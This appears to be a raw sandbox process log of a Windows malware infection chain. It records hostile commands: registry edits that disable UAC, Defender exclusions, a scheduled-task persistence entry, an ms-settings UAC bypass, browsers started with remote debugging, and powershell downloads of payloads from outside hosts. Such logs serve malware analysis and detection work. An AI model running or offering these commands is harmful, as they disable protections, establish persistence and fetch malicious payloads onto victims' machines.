"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2392 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c008d2e-3f5f-487e-ba83-5b75eab7b7e7} 852 "\\.\pipe\gecko-crash-server-pipe.852" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2868 -childID 1 -isForBrowser -prefsHandle 3116 -prefMapHandle 2964 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b40a967-8ce1-4454-bdc6-c08266bfe3ec} 852 "\\.\pipe\gecko-crash-server-pipe.852" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4112 -prefMapHandle 3712 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {65685861-8eb3-4b0c-a12e-e8fbb45c0272} 852 "\\.\pipe\gecko-crash-server-pipe.852" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4720 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4728 -prefMapHandle 4116 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f80aabe-99dd-49f1-b023-14b09c7daef6} 852 "\\.\pipe\gecko-crash-server-pipe.852" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5160 -childID 3 -isForBrowser -prefsHandle 5056 -prefMapHandle 4716 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {15a2571e-2846-44da-84da-1e28261cb73b} 852 "\\.\pipe\gecko-crash-server-pipe.852" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2748 -childID 4 -isForBrowser -prefsHandle 5420 -prefMapHandle 5424 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {749a0ad1-b472-47d6-a6fc-e1371c43eca6} 852 "\\.\pipe\gecko-crash-server-pipe.852" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5408 -childID 5 -isForBrowser -prefsHandle 5620 -prefMapHandle 5624 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {814f6938-3e66-48a8-97b2-867ce71bb527} 852 "\\.\pipe\gecko-crash-server-pipe.852" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6132 -childID 6 -isForBrowser -prefsHandle 2324 -prefMapHandle 6100 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c9f164b-9972-4dd9-8599-b1fe329bf7fd} 852 "\\.\pipe\gecko-crash-server-pipe.852" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6372 -childID 7 -isForBrowser -prefsHandle 5480 -prefMapHandle 5280 -prefsLen 27211 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32ca7949-d2a2-4e7f-b966-bb196b2ee2f1} 852 "\\.\pipe\gecko-crash-server-pipe.852" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4680 -childID 8 -isForBrowser -prefsHandle 5116 -prefMapHandle 4676 -prefsLen 27777 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8a2a239-9e0b-46d3-82ce-5924e3797577} 852 "\\.\pipe\gecko-crash-server-pipe.852" tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B1B.tmp\3B1C.tmp\3B1D.bat C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\436346~1\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\Desktop\436346~1\Files\PORNHU~1.EXE
"C:\Users\Admin\Desktop\436346~1\Files\PORNHU~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3CA2.tmp\3CA3.tmp\3CA4.bat C:\Users\Admin\Desktop\436346~1\Files\PORNHU~1.EXE goto :target"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff81746f8,0x7ffff8174708,0x7ffff8174718
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,1797800948352853437,7983498651820736367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,1797800948352853437,7983498651820736367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,1797800948352853437,7983498651820736367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,1797800948352853437,7983498651820736367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,1797800948352853437,7983498651820736367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,1797800948352853437,7983498651820736367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,1797800948352853437,7983498651820736367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,1797800948352853437,7983498651820736367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5700 /prefetch:8
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Users\Admin\Desktop\4363463463464363463463463\Files\getlab.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\getlab.exe"
C:\Users\Admin\AppData\Local\Temp\is-21IMK.tmp\getlab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-21IMK.tmp\getlab.tmp" /SL5="$303D0,3318564,54272,C:\Users\Admin\Desktop\4363463463464363463463463\Files\getlab.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\exbuild.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\exbuild.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause berry_player_11275
C:\Users\Admin\AppData\Local\Berry Player 3.3.7\berryplayer32.exe
"C:\Users\Admin\AppData\Local\Berry Player 3.3.7\berryplayer32.exe" -i
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause berry_player_11275
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\rstxdhuj.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\test6.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\test6.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe'
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winsvc.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winsvc.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\TPB-1.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\TPB-1.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 8176 -ip 8176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8176 -s 80
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffffd8ecc40,0x7ffffd8ecc4c,0x7ffffd8ecc58
C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2316,i,3664282635035278440,15497815861165375086,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2312 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1740,i,3664282635035278440,15497815861165375086,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2348 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1972,i,3664282635035278440,15497815861165375086,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,3664282635035278440,15497815861165375086,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,3664282635035278440,15497815861165375086,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3380 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe"
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\xblkpfZ8Y4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\xblkpfZ8Y4.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,3664282635035278440,15497815861165375086,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test28.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test28.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test26.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test26.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test27.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test27.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test29.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test29.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,3664282635035278440,15497815861165375086,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4704 /prefetch:8
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test24.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test24.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\test25.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test25.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_System.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_System.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\main_v4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\main_v4.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffff81746f8,0x7ffff8174708,0x7ffff8174718
C:\Users\Admin\Desktop\New Text Document mod.exse\a\TikTok18.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\TikTok18.exe"
C:\Users\Admin\AppData\Local\Temp\e5ac65e\TikTok18.exe
run=1 shortcut="C:\Users\Admin\Desktop\New Text Document mod.exse\a\TikTok18.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\fHR9z2C.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\fHR9z2C.exe"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GTA_V.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GTA_V.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\dmshell.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\dmshell.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_Synaptics.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_Synaptics.exe" InjUpdate
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\is-L1Q0J.tmp\GTA_V.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L1Q0J.tmp\GTA_V.tmp" /SL5="$606E4,18380059,1093120,C:\Users\Admin\Desktop\4363463463464363463463463\Files\GTA_V.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AmLzNi.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AmLzNi.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\papa_hr_build.exe"
C:\Users\Admin\AppData\Local\Temp\is-0D8G3.tmp\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\is-0D8G3.tmp\vcredist_x86.exe" /q:a /c:"msiexec.exe /i vcredist.msi /qn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6340 -ip 6340
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i vcredist.msi /qn
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 296
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6700 -ip 6700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 1280
C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_System.exe'
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6700 -ip 6700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 1280
C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_pornhub_downloader.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\._cache_pornhub_downloader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C00617C0D27D4204B6E4412785FE274F
C:\Windows\system32\cmd.exe
/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
C:\Users\Admin\Desktop\4363463463464363463463463\Files\GTA_V.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GTA_V.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
C:\Users\Admin\AppData\Local\Temp\is-VVJ18.tmp\GTA_V.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VVJ18.tmp\GTA_V.tmp" /SL5="$1206F8,18380059,1093120,C:\Users\Admin\Desktop\4363463463464363463463463\Files\GTA_V.exe"
C:\Windows\system32\cmd.exe
/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5536.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\5536.vbs" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\system32\cmd.exe
/c start /B ComputerDefaults.exe
C:\Windows\system32\ComputerDefaults.exe
ComputerDefaults.exe
C:\Windows\system32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\5536.vbs
